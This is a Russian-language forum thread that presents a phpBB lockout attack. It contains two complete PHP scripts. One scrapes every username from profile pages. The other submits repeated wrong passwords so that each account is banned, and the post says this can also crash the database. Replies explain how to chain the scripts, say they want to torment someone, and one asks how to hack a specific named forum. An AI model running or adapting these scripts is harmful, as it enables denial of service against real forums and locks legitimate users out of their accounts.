Уязвимость позволяет забанить всех пользователей на форуме, что в свою очередь может вызвать сбой в работе базы данных. Суть ошибки состоит в том, что при авторизации пользователя можно вести неверные данные x-раз, что приведет к бану соответствующего пользователя форума на определенное время указное в админке форума и пользователь при авторизации увидит следующее - (Максимальное количество попыток (X) войти на форум было исчерпано. Вы не сможете войти на форум в последующие Y минут.) или произойдет ошибка в базе данных (phpBB : Critical Error Could not connect to the database). Эксплоит (написан на php) Собирает в файл Ники всех пользователей форума.--------------- Автор: k1b0rg --------------- Code: <? $host="Сайт"; $papka="Папка с форумом"; $port=80; $number_users=2050; $start=1; set_time_limit(0); $file="user.txt"; $file=fopen($file,*w*); for($i=$start;$i<=$number_users;$i++) {$request="GET http://$host/$papka/profile.php?mode=viewprofile&u=$i HTTP/1.0\r\n"; $request.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, *\/*\r\n"; $request.="Accept-Language: ru\r\n"; $request.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"; $request.="Host: $host\r\n"; $request.="Proxy-Connection: Keep-Alive\r\n\r\n"; $sock=fsockopen("$host",$port,$errno,$errstr); fputs($sock,$request); while(!feof($sock)) {$str=fgets($sock); if(preg_match("/nowrap=\"nowrap\">Профиль пользователя (.*)<\/th>/i",$str,$return)) {if(trim($return[1])!=**) {fputs($file,"$return[1]\n"); }}}} fclose($file); fclose($sock); ?> Скрипт для сборки всех зарегенных юзеров универсальный т.е. подходит под любой форум. Но только если: 1. Если не зарегеным пользователям можно смотреть профайл других (иначе придеться еще посылать строку с вашими куками) 2. Правильно настроен preg_match("/nowrap=\"nowrap\">Профиль пользователя (.*)<\/th>/i",$str,$return)) в некоторых форумах придеться немного изменить, если допустим имя юзверя находиться в титле <title>Юзер - Lamer</title> то переписываем preg_match как preg_match("/<title>Юзер - (.*)<\/title>/i",$str,$return)) Сам сплоит--------------- Автор: ASSCOL --------------- Code: <? set_time_limit(0); $host="Сайт"; $papka="Папка с форумом"; $file=fopen("user.txt",*r*); while(!feof($file)) { $str=fgets($file); $str=trim($str); for($i=0; $i<=5; $i++) { $request="POST http://$host/$papka/login.php?sid=f1bed4ab383a8521a612d6896e0ee21e HTTP/1.0\r\n"; $request.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, *\/*\r\n"; $request.="Referer: http://$host/$papka/login.php\r\n"; $request.="Accept-Language: ru\r\n"; $request.="Content-Type: application/x-www-form-urlencoded\r\n"; $request.="Proxy-Connection: Keep-Alive\r\n"; $request.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MyIE2)\r\n"; $request.="Host: $host\r\n"; $request.="Content-Length: 73\r\n"; $request.="Pragma: no-cache\r\n"; $request.="Cookie: b=b; phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=f1bed4ab383a8521a612d6896e0ee21e; hotlog=1\r\n"; $request.="\r\n"; $request.="username=$str&password=5555&redirect=&login=%C2%F5%EE%E4\r\n\r\n"; $fp=fsockopen("$host",80,$errstr,$errno); fputs($fp,$request); fclose($fp); } } ?> -------------------------------- Нашел уязвимость ASSCOL. --------------------------------Статья взята с сайта http://comp-info.ru
берешь первый скрипт, он вытягивает все ники с форума ,а потом их записываешь в файл user.txt и запускаешь второй сплойт
Вешь прикольная, но смысла с нее помоему маловато =) Разве что насолить плотно кому-то =) Ох счас поиздеваюсь =) Спасибо k1b0rg =)
Я щас не помню уже. по-мойму на myphpbb.com.ru или где-то в обсуждении короче этой версии. Речь зашла об этой блокировке и кто-то предположил что так можно банить, что собственно само собой разумеется. Вообще непонятно, о чем девелоперы думают... Там по-мойму был какой-то патч, убирающий эту фигню
Ну а если человек ее сам нушол этот глюк, тогда что? авторство сохранено, и удали плиз наши мессаги, чтобы во флуд не переросла тема
Слушайте. Помогите узнать версию PHPBB форума: http://forum.tikhvin.info И если кто знает как его мона хакнуть?